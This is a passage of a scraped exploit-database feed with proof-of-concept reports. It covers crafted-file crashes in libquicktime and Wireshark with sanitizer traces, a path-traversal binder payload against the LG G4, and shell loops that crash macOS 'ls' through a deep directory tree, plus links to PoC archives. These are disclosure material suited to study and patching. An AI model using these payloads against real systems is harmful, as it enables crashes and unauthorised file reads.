libquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4\r\n \r\n \r\n=================================================================\r\n==41642==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cb1 at pc 0x7f3aa15d47f3 bp 0x7ffc98430d00 sp 0x7ffc98430cf8\r\nWRITE of size 1 at 0x602000009cb1 thread T0\r\n #0 0x7f3aa15d47f2 in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84\r\n #1 0x7f3aa1590bd8 in quicktime_read_stsd_video /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:557\r\n #2 0x7f3aa1594eb8 in quicktime_read_stsd_table /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:694\r\n #3 0x7f3aa158bd4d in quicktime_finalize_stsd /home/a/Downloads/libquicktime-1.2.4/src/stsd.c:336\r\n #4 0x7f3aa1566147 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:231\r\n #5 0x7f3aa1562a9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155\r\n #6 0x7f3aa15b7f1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247\r\n #7 
0x7f3aa156972a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221\r\n #8 0x7f3aa12fe658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791\r\n #9 0x7f3aa13054a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026\r\n #10 0x7f3aa12d65da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075\r\n #11 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987\r\n #12 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #13 0x7f3a9ebbcec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #14 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\n0x602000009cb1 is located 0 bytes to the right of 1-byte region [0x602000009cb0,0x602000009cb1)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f3aa15d451a in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:81\r\n \r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84 quicktime_user_atoms_read_atom\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c047fff9390: fa fa fa fa fa fa[01]fa fa fa 00 fa fa fa 00 04\r\n 0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa 
fa fd fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==41642==ABORTING\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9127\r\n \r\n \r\n###################################\r\n7.\r\nthe quicktime_video_width function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4\r\n \r\n \r\n=================================================================\r\n==10979==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009d00 at pc 0x7f36a1017a37 bp 0x7ffe65a90010 sp 0x7ffe65a90008\r\nREAD of size 4 at 0x602000009d00 thread T0\r\n #0 0x7f36a1017a36 in quicktime_video_width /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998\r\n #1 0x7f36a1017a36 in quicktime_init_maps /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1633\r\n #2 0x7f36a101af13 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1891\r\n #3 0x7f36a10204a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026\r\n #4 0x7f36a0ff15da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075\r\n #5 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987\r\n #6 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #7 0x7f369e8d7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #8 0x47f3dc in _start 
(/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\n0x602000009d00 is located 4 bytes to the right of 12-byte region [0x602000009cf0,0x602000009cfc)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f36a12543ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66\r\n \r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998 quicktime_video_width\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9350: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\r\n 0x0c047fff9360: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\r\n 0x0c047fff9370: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd\r\n 0x0c047fff9380: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa\r\n 0x0c047fff9390: fa fa fd fa fa fa fd fa fa fa 01 fa fa fa 00 04\r\n=>0x0c047fff93a0:[fa]fa 00 04 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\n 0x0c047fff93f0: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==10979==ABORTING\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9128\r\n \r\n \r\n \r\n 
\r\n=================================\r\n \r\n \r\nqflb.wu () dbappsecurity com cn\r\n \r\n \r\nProofs of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42148.zip\n\n# 0day.today [2018-02-27] #", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/27921"}, {"lastseen": "2018-01-09T03:21:54", "bulletinFamily": "exploit", "description": "Exploit for Android platform in category dos / poc", "modified": "2017-02-14T00:00:00", "published": "2017-02-14T00:00:00", "href": "https://0day.today/exploit/description/27006", "id": "1337DAY-ID-27006", "type": "zdt", "title": "LG G4 - lghashstorageserver Directory Traversal Vulnerability", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=987\r\n \r\nThe lghashstorageserver binder service (/system/bin/lghashstorageserver) \r\nimplementation on the LG G4 is vulnerable to path traversal, allowing an\r\napp to read and write 0x20 bytes from any file in the context of the\r\nlghashstorageserver.\r\n \r\nSee attached for a PoC which reads from /proc/self/attr/current for the \r\nlghashstorageserver.\r\n \r\n[0] opening /dev/binder\r\n[0] looking up service lghashstorage\r\n0000: 00 . 01 . 00 . 00 . 1a . 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 .\r\n0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 6f o 00 . 73 s 00 . 2e . 00 . 49 I 00 .\r\n0032: 53 S 00 . 65 e 00 . 72 r 00 . 76 v 00 . 69 i 00 . 63 c 00 . 65 e 00 . 4d M 00 .\r\n0048: 61 a 00 . 6e n 00 . 61 a 00 . 67 g 00 . 65 e 00 . 72 r 00 . 00 . 00 . 00 . 00 .\r\n0064: 0d . 00 . 00 . 00 . 6c l 00 . 67 g 00 . 68 h 00 . 61 a 00 . 73 s 00 . 68 h 00 .\r\n0080: 73 s 00 . 74 t 00 . 6f o 00 . 72 r 00 . 61 a 00 . 67 g 00 . 65 e 00 . 00 . 
00 .\r\nBR_NOOP:\r\nBR_TRANSACTION_COMPLETE:\r\nBR_NOOP:\r\nBR_REPLY:\r\n target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000\r\n pid 0 uid 1000 data 24 offs 8\r\n0000: 85 . 2a * 68 h 73 s 7f . 01 . 00 . 00 . 01 . 00 . 00 . 00 . 55 U 00 . 00 . 00 .\r\n0016: 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .\r\n - type 73682a85 flags 0000017f ptr 0000005500000001 cookie 0000000000000000\r\n[0] got handle 00000001\r\n[0] reading hash\r\n0000: 00 . 01 . 00 . 00 . 1b . 00 . 00 . 00 . 63 c 00 . 6f o 00 . 6d m 00 . 2e . 00 .\r\n0016: 6c l 00 . 67 g 00 . 65 e 00 . 2e . 00 . 49 I 00 . 48 H 00 . 61 a 00 . 73 s 00 .\r\n0032: 68 h 00 . 53 S 00 . 74 t 00 . 6f o 00 . 72 r 00 . 61 a 00 . 67 g 00 . 65 e 00 .\r\n0048: 53 S 00 . 65 e 00 . 72 r 00 . 76 v 00 . 69 i 00 . 63 c 00 . 65 e 00 . 00 . 00 .\r\n0064: 2e . 2e . 2f / 2e . 2e . 2f / 2e . 2e . 2f / 2e . 2e . 2f / 2e . 2e . 2f / 2e .\r\n0080: 2e . 2f / 2e . 2e . 2f / 70 p 72 r 6f o 63 c 2f / 73 s 65 e 6c l 66 f 2f / 61 a\r\n0096: 74 t 74 t 72 r 2f / 63 c 75 u 72 r 72 r 65 e 6e n 74 t 00 . 00 . 00 . 00 . 00 .\r\nBR_NOOP:\r\nBR_TRANSACTION_COMPLETE:\r\nBR_NOOP:\r\nBR_REPLY:\r\n target 0000000000000000 cookie 0000000000000000 code 00000000 flags 00000000\r\n pid 0 uid 1000 data 36 offs 0\r\n0000: 75 u 3a : 72 r 3a : 6c l 67 g 68 h 61 a 73 s 68 h 73 s 74 t 6f o 72 r 61 a 67 g\r\n0016: 65 e 73 s 65 e 72 r 76 v 65 e 72 r 3a : 73 s 30 0 00 . 00 . 00 . 00 . 00 . 00 .\r\n0032: 00 . 00 . 00 . 
00 .\r\nu:r:lghashstorageserver:s0\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41352.zip\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/27006", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-06T03:39:17", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2016-02-26T00:00:00", "published": "2016-02-26T00:00:00", "href": "https://0day.today/exploit/description/25853", "id": "1337DAY-ID-25853", "title": "Wireshark - print_hex_data_buffer / print_packet Use-After-Free", "type": "zdt", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=651\r\n \r\nThe following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==14146==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000003a0 at pc 0x000000b2c8eb bp 0x7ffdfc45fa70 sp 0x7ffdfc45fa68\r\nREAD of size 1 at 0x6070000003a0 thread T0\r\n #0 0xb2c8ea in print_hex_data_buffer wireshark/epan/print.c:987:13\r\n #1 0xb2bf43 in print_hex_data wireshark/epan/print.c:904:14\r\n #2 0x5422e2 in print_packet wireshark/tshark.c:4155:10\r\n #3 0x53cb2e in process_packet wireshark/tshark.c:3742:7\r\n #4 0x535d90 in load_cap_file wireshark/tshark.c:3484:11\r\n #5 0x52c1df in main wireshark/tshark.c:2197:13\r\n \r\n0x6070000003a0 is located 0 bytes inside of 65-byte region [0x6070000003a0,0x6070000003e1)\r\nfreed by thread T0 here:\r\n #0 0x4d6ce0 in free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30\r\n #1 0xc1fd8e in real_free wireshark/epan/tvbuff_real.c:47:3\r\n #2 0xc2229c in tvb_free_internal wireshark/epan/tvbuff.c:110:3\r\n #3 0xc22049 in tvb_free_chain wireshark/epan/tvbuff.c:135:3\r\n #4 0xc21ed1 in tvb_free 
wireshark/epan/tvbuff.c:125:2\r\n #5 0xbc972e in free_all_fragments wireshark/epan/reassemble.c:351:4\r\n #6 0xbd40e5 in fragment_add_seq_common wireshark/epan/reassemble.c:1919:5\r\n #7 0xbd4895 in fragment_add_seq_check_work wireshark/epan/reassemble.c:2006:12\r\n #8 0xbd43a7 in fragment_add_seq_check wireshark/epan/reassemble.c:2050:9\r\n #9 0x2fb8256 in dissect_mux27010 wireshark/epan/dissectors/packet-mux27010.c:949:28\r\n #10 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #11 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9\r\n #12 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9\r\n #13 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11\r\n #14 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #15 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9\r\n #16 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8\r\n #17 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8\r\n #18 0xadffde in dissect_record wireshark/epan/packet.c:501:3\r\n #19 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2\r\n #20 0x53c91b in process_packet wireshark/tshark.c:3728:5\r\n #21 0x535d90 in load_cap_file wireshark/tshark.c:3484:11\r\n #22 0x52c1df in main wireshark/tshark.c:2197:13\r\n \r\npreviously allocated by thread T0 here:\r\n #0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40\r\n #1 0x7ff6062f0610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)\r\n #2 0xbe1202 in fragment_add_seq_work wireshark/epan/reassemble.c:1793:2\r\n #3 0xbd4181 in fragment_add_seq_common wireshark/epan/reassemble.c:1925:6\r\n #4 0xbd4895 in fragment_add_seq_check_work wireshark/epan/reassemble.c:2006:12\r\n #5 0xbd43a7 in fragment_add_seq_check wireshark/epan/reassemble.c:2050:9\r\n #6 0x2fb8256 in dissect_mux27010 wireshark/epan/dissectors/packet-mux27010.c:949:28\r\n #7 0xaf3794 in 
call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #8 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9\r\n #9 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9\r\n #10 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11\r\n #11 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8\r\n #12 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9\r\n #13 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8\r\n #14 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8\r\n #15 0xadffde in dissect_record wireshark/epan/packet.c:501:3\r\n #16 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2\r\n #17 0x53c91b in process_packet wireshark/tshark.c:3728:5\r\n #18 0x535d90 in load_cap_file wireshark/tshark.c:3484:11\r\n #19 0x52c1df in main wireshark/tshark.c:2197:13\r\n \r\nSUMMARY: AddressSanitizer: heap-use-after-free wireshark/epan/print.c:987:13 in print_hex_data_buffer\r\nShadow bytes around the buggy address:\r\n 0x0c0e7fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c0e7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c0e7fff8040: fa fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd\r\n 0x0c0e7fff8050: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd\r\n 0x0c0e7fff8060: fd fd fa fa fa fa fd fd fd fd fd fd fd fd fd fd\r\n=>0x0c0e7fff8070: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fa fa fa\r\n 0x0c0e7fff8080: fa fa fd fd fd fd fd fd fd fd fd fa fa fa fa fa\r\n 0x0c0e7fff8090: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fd fd\r\n 0x0c0e7fff80a0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd\r\n 0x0c0e7fff80b0: fd fd fd fd fd fa fa fa fa fa 00 00 00 00 00 00\r\n 0x0c0e7fff80c0: 00 00 06 fa fa fa fa fa 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n 
Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==14146==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11799. Attached are three files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39503.zip\n\n# 0day.today [2018-03-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25853"}, {"lastseen": "2018-04-09T03:40:05", "bulletinFamily": "exploit", "description": "Mac OS X version 10.11 suffered from an FTS deep structure of the file system buffer overflow vulnerability.", "modified": "2015-12-08T00:00:00", "published": "2015-12-08T00:00:00", "id": "1337DAY-ID-24685", "href": "https://0day.today/exploit/description/24685", "type": "zdt", "title": "Mac OS X 10.11 FTS Deep Structure of the File System Buffer Overflow Exploit", "sourceData": "MacOS X 10.11 FTS Deep structure of the file system Buffer Overflow\r\nCredit: Maksymilian Arciemowicz ( CXSECURITY )\r\nWebsite: \r\nhttp://cxsecurity.com/\r\nhttp://cert.cx/\r\n\r\n\r\nAffected software:\r\n- MACOS's Commands such as: ls, find, rm \r\n- iPhone 4s and later,\r\n- Apple Watch Sport, Apple Watch, Apple Watch Edition and Apple Watch Hermes\r\n- Apple TV (4th generation)\r\n- probably more\r\n\r\nApple file system suffer for a issue recognised in FTS library. The main problem occur when we create deep filesystem hierarchy. 
Unexpected behavior of many programs and invalid memory writes seem really interesting.\r\n \r\nPoC:\r\nCreate a directory and perform the following actions:\r\n\r\n\r\n# for i in {1..1024}; do mkdir B && cd B; done\r\n...\r\ncd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory\r\n\r\n\r\nIf such an error occurs, don't panic; the script will continue. When the script finishes, you need to go back to the top of the directory tree. E.g.\r\n\r\n\r\n# for i in {1..1024}; do cd .. ; done\r\n\r\n\r\nThen you can perform a recursive 'ls' command. Let's run it ten times:\r\n\r\n\r\n# for i in {1..10}; do ls -laR > /dev/null; done\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nSegmentation fault: 11\r\nSegmentation fault: 11\r\nSegmentation fault: 11\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\nSegmentation fault: 11\r\nls: B: No such file or directory\r\nls: B: No such file or directory\r\n\r\n\r\nIt crashes randomly. 
Let's see valgrind and lldb \r\n\r\n\r\nLLDB:\r\n...\r\n/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B:\r\ntotal 0\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 ..\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8\r\n\r\n./B/B/B/B/B/B/B/B/..../B/B:\r\nProcess 987 stopped\r\n* thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00)\r\n frame #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18\r\nlibsystem_c.dylib`strlen:\r\n-> 0x7fff97ab6d32 <+18>: pcmpeqb (%rdi), %xmm0\r\n 0x7fff97ab6d36 <+22>: pmovmskb %xmm0, %esi\r\n 0x7fff97ab6d3a <+26>: andq $0xf, %rcx\r\n 0x7fff97ab6d3e <+30>: orq $-0x1, %rax\r\n\r\n(lldb) x/x $rdi\r\nerror: memory read failed for 0xfeb66c00\r\n(lldb) register read\r\nGeneral Purpose Registers:\r\n rax = 0x00000000ffffffff\r\n rbx = 0x00000000ffffffff\r\n rcx = 0x00000000feb66c08\r\n rdx = 0x00000000feb66c08\r\n rdi = 0x00000000feb66c00\r\n rsi = 0x00007fff97afbb4d libsystem_c.dylib`__vfprintf + 2742\r\n rbp = 0x00007fff5fbfe710\r\n rsp = 0x00007fff5fbfe710\r\n...\r\n rip = 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18\r\n...\r\n(lldb) bt\r\n* thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 
'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00)\r\n * frame #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18\r\n frame #1: 0x00007fff97afc6e8 libsystem_c.dylib`__vfprintf + 5713\r\n frame #2: 0x00007fff97b2535d libsystem_c.dylib`__v2printf + 669\r\n frame #3: 0x00007fff97b095a9 libsystem_c.dylib`_vsnprintf + 596\r\n frame #4: 0x00007fff97b0965e libsystem_c.dylib`vsnprintf + 80\r\n frame #5: 0x00007fff97b3acc0 libsystem_c.dylib`__snprintf_chk + 128\r\n frame #6: 0x00000001000024a8 ls`___lldb_unnamed_function16$$ls + 1564\r\n frame #7: 0x0000000100001cfd ls`___lldb_unnamed_function14$$ls + 421\r\n frame #8: 0x0000000100001a70 ls`___lldb_unnamed_function13$$ls + 2300\r\n frame #9: 0x00007fff93cdb5ad libdyld.dylib`start + 1\r\n\r\n=== Time for Valgrind =============\r\n\r\nB/B/B/B/B/../B:\r\ntotal 0\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 ..\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 
X8\r\n\r\n./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B:\r\ntotal 0\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 ..\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 